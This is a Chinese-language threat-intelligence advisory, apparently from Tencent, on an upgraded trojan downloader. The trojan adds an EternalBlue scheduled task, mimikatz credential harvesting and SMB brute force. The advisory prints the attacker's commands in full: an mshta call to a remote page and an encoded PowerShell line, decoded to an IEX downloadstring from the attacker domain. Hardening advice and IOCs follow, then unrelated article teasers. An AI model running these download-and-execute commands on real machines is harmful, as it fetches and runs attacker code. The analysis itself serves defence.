曾利用驱动人生升级通道传播的木马下载器攻击方法再次升级
haoteby 2025-09-01 02:31 7 浏览
一、概述
御见威胁情报中心1月25日再次监测到曾利用驱动人生升级通道传播的木马下载器攻击方法再升级。
本次升级主要变化在于攻击模块,木马在之前的版本上,新增计划任务“DnsScan”,在其中将永恒之蓝攻击模块C:\Windows\Temp\svchost.exe设置为木马执行当天7:05开始,之后每个一小时执行一次。
该木马团伙持续活跃,最严重的一次破坏是入侵驱动人生公司,篡改商业软件的升级配置,利用正规软件的升级通道传播病毒。在这个木马传播渠道被封堵之后,该团伙仍在利用其他传播渠道持续改进该木马下载器。
该团伙的历次活动,均被腾讯御见威胁情报中心捕获:
二、技术分析
升级后的攻击模块svchost.exe除了利用永恒之蓝漏洞对内网以及外网机器进行扫描攻击外,还新增了以下功能:
1、利用powershell版黑客工具mimikatz抓取用户机器域登录密码进行横向传播
创建m.ps1并将混淆后的mimikatz工具代码写入。
将利用工具抓取到的用户域登录密码保存到mkatz.ini。
2、攻击模块尝试通过内置的弱密码字典尝试SMB爆破远程登录
3、创建计划任务执行远程hta代码
mshta hxxp://w.beahh.com/page.html?p%COMPUTERNAME%
4、创建计划任务执行远程powershell代码
powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=
powershell命令解密后内容为:
IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)
三、安全建议
1.服务器暂时关闭不必要的端口(如135、139、445),方法可参考:
https://guanjia.qq.com/web_clinic/s8/585.html
2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
3.使用杀毒软件拦截可能的病毒攻击;
4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
IOCs
Domain
v.beahh.com
w.beahh.com
Md5
cce36235a525858eb55070847296c4c8
34410a21398137d71258e2658ecddaeb
4cb4ccfd1086fc78d2a1a063862bff41
65d17d790098fdff32c96bce0be6645e
7f8dde92700f5013b4ed23c6ec5b7337
8bf4cfe6d0938cd8a618e3a4cd32c79d
a56a29ddff74c1b536fa5c97863f0d35
ae4b536a5b7c6d6decc7e96591ce67f8
b73dfc81a367f4dfa44bb209ed9e5e67
c85cb83a850b4ccd2d2232a4d356d607
f6cd992c002be66c01ea2e16e3cd4df2
f75f0261296a8b7b81f54a076c58439c
fd38cca1e2fa4a7d14a2943b3ad5d20c
URL
hxxp://v.beahh.com/v
hxxp://w.beahh.com/page.html
参考链接:
永恒之蓝漏洞扩散传播的挖矿木马预警
https://mp.weixin.qq.com/s/xBx5tOl9LJmWurqgD8KYhQ
“驱动人生”升级通道传木马完整技术分析报告
https://mp.weixin.qq.com/s/XmEalNxxQ3kAySDvIVTDOw
针对驱动人生公司的定向攻击活动分析报告
https://mp.weixin.qq.com/s/ctBgivcvH216dwq00WRmOA
利用驱动人生升级通道传播的木马下载器出现新变化
https://media.weibo.cn/article?id=2309404319028930855515
驱动人生永恒之蓝下载器木马的最新变化(1.25)
https://guanjia.qq.com/news/n3/2473.html
如何关闭不必要的端口(如135、139、445)
https://guanjia.qq.com/web_clinic/s8/585.html
(来源腾讯电脑管家)
相关推荐
- 全球仅 1 辆!粉橙“郁金香”GT4 RS炸街,赞德沃特周末围观指南
-
“各位直男同胞,如果你女友突然送你一束‘郁金香’,别急着感动——万一钥匙在手,0-100km/h3.4秒,你会先感动还是先腿软?”...
- 国际足坛那些与国旗无关的国家队球衣
-
在世界足坛,国家队的球衣颜色一般都与国旗的颜色有关,不过也有例外。都知道意大利球衣由绿白红三色组成,但意大利球衣却是蓝色的,这是为什么呢?事实上意大利从1922年起就穿蓝色球衣,而那是当时意大利王室的...
- 世界主权国家国旗一览(欧洲篇)_世界国家的旗帜
-
1、芬兰(芬兰共和国)2、瑞典(瑞典王国)3、挪威(挪威王国)4、冰岛(冰岛共和国...
- “黑色”机场:17国国旗全降半旗,荷兰王室和政府成员沉默以待
-
8年前,也就是2014年的7月23日,荷兰国王夫妇一身深沉黑装走在队伍的最前沿,身后跟着的是政府总理以及部分高级官员,没有例外,这些人的着装全都是清一色的黑装。不仅于此,机场上空的17个国家国旗也全部...
- LiveScore为范戴克庆生:史上唯一举起英超奖杯的荷兰队长
-
今天是利物浦队长范戴克的34岁生日,媒体LiveScore晒出海报为范戴克庆生。海报中,范戴克身披荷兰国旗,手举英超奖杯。LiveScore写道:“祝范戴克生日快乐!史上唯一举起英超奖杯的荷兰队长!...
- 为何很多国家都用三色条纹国旗?_为什么很多国家国旗是三道杠
-
为何很多国家都用三色条纹国旗?你有没有发现,很多国家的国旗都是三种颜色的条纹旗,荷兰、俄罗斯、法国的国旗甚至连颜色都一样,实在是很难区分。据统计,世界上近1/3的国家都用的是三色条纹旗:俄罗斯是横着的...
- 西欧12个国家国旗的设计者和由来_西欧12个国家国旗的设计者和由来简介
-
1、法国国旗的设计者:答:雅克·路易·大卫:出生于法国巴黎,法国新古典主义画派画家,毕业于法国皇家绘画雕塑院。1794年设计的三色旗被正式采用为法国国旗。2、俄罗斯国旗的设计者:答:彼得一世:出生于莫...
- 世界杯再现橙色风暴,荷兰队为何要穿橙色?原因竟是个谐音梗
-
在世界杯上的荷兰队,总是给人留下深刻的印象。大开大合的全攻全守踢法,两翼齐飞的性感足球让人过目不忘。作为球迷,首先希望橙色军团荷兰队能在2022年,再次掀起郁金香风暴。荷兰队的橙色球衣给人以青春活力的...
- 国旗太像了!欧洲人自己也分不清,闹了不少笑话
-
国旗是一个国家身份的象征。但很多小伙伴都发现了,欧洲很多国家的国旗都十分相似,“傻傻分不清”。...
- 每日一旗——西欧篇荷兰_荷兰 西欧
-
从这期文章开始,我将在每一期文章里给大家介绍一面国旗,(希望我能够坚持下去...
- 剧荒吗?爱奇艺高热度“谍战剧”TOP5,剧粉不容错过!
-
Win2000服务器配置共享权限的老问题至今还在坑人,运维稍不留神就被各种"访问被拒"搞崩溃。关键得揪住三个死结:SMB协议兼容性、跨系统认证机制、权限继承逻辑,少一个环节全网瘫痪。W...
- 紧急 全球爆发比特币勒索病毒攻击,紧急应对措施!
-
北京时间2017年5月12日20时左右,全球爆发大规模勒索软件感染事件,我国大量行业企业内网、阿里云等大规模感染,教育网受损严重,攻击造成了教学系统瘫痪,甚至包括校园一卡通系统。判定该勒索软件是...
- 曾利用驱动人生升级通道传播的木马下载器攻击方法再次升级
-
一、概述御见威胁情报中心1月25日再次监测到曾利用驱动人生升级通道传播的木马下载器攻击方法再升级。本次升级主要变化在于攻击模块,木马在之前的版本上,新增计划任务“DnsScan”,在其中将永恒之蓝攻击...
- 【建议收藏】292个聚丙烯牌号性能、用途汇总!
-
聚丙烯(PP)作为五大通用塑料之一,其产量占据着世界第二把交椅,国内产量也是不可小觑。...
- 系统小技巧:改变Windows 10默认登录验证方式
-
在早期的WindowsXP或Vista系统中,密码凭据是登录系统的唯一选项。Windows10则大大不同,它在登录时能够提供包括本地账户密码、网络账户密码、Pin码、图形码以及其他各种验证识别方式...